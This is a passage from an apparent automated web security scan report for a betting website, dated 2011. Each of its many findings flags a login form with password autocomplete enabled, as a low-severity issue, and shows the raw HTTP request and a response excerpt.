Content-Length: 48202
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Contact?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Contact" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.127. https://www.interwetten.com/Header-Help-FAQ

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Help-FAQ

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Help-FAQ HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:58 GMT
Connection: close
Content-Length: 48223
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Help-FAQ?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Help-FAQ" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.128. https://www.interwetten.com/Header-Menu-Casino

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Menu-Casino

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Menu-Casino HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:29 GMT
Connection: close
Content-Length: 49628
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Casino?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Casino" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.129. https://www.interwetten.com/Header-Menu-Home

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Menu-Home

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Menu-Home HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:03 GMT
Connection: close
Content-Length: 48244
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Home?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Home" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.130. https://www.interwetten.com/Header-Menu-Live

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Menu-Live

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Menu-Live HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:11 GMT
Connection: close
Content-Length: 48264
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Live?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Live" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.131. https://www.interwetten.com/Header-Menu-Sportsbook

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Menu-Sportsbook

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Menu-Sportsbook HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:44:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:05 GMT
Connection: close
Content-Length: 47743
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Menu-Sportsbook?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Menu-Sportsbook" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.132. https://www.interwetten.com/Header-Payment-possibilities

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Payment-possibilities

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Payment-possibilities HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:59 GMT
Connection: close
Content-Length: 47869
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Payment-possibilities?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Payment-possibilities" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.133. https://www.interwetten.com/Header-Tutorials

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Tutorials

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Tutorials HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:56 GMT
Connection: close
Content-Length: 49586
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="Header-Tutorials?404%3bhttp%3a%2f%2fwww.interwetten.com%3a80%2fHeader-Tutorials" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.134. https://www.interwetten.com/ScriptResource.axd

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /ScriptResource.axd

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /ScriptResource.axd HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:57 GMT
Connection: close
Content-Length: 48393
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="ScriptResource.axd" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.135. https://www.interwetten.com/WebResource.axd

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /WebResource.axd

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /WebResource.axd HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:53 GMT
Connection: close
Content-Length: 48387
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="Html1" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><t
...[SNIP]...
<body>
<form method="post" action="WebResource.axd" id="form1">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.136. https://www.interwetten.com/en/Default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/Default.aspx

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /en/Default.aspx HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPool_Web01-Web07=1717899692.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:44:27 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...
<!-- ClickTale end of Top part -->
   <form method="post" action="Default.aspx" id="form">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.137. https://www.interwetten.com/en/american-football-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/american-football-betting

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /en/american-football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:09 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:09 GMT
Connection: close
Content-Length: 223280
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/american-football-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.138. https://www.interwetten.com/en/australian-rules-football-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/australian-rules-football-betting

Issue detail

The page contains a form with the following action URL: /en/australian-rules-football-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/australian-rules-football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:32 GMT
Connection: close
Content-Length: 223367
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/australian-rules-football-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.139. https://www.interwetten.com/en/beach-soccer-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/beach-soccer-betting

Issue detail

The page contains a form with the following action URL: /en/beach-soccer-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/beach-soccer-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:21 GMT
Connection: close
Content-Length: 221952
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/beach-soccer-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.140. https://www.interwetten.com/en/boxing-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/boxing-betting

Issue detail

The page contains a form with the following action URL: /en/boxing-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/boxing-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223215
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/boxing-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

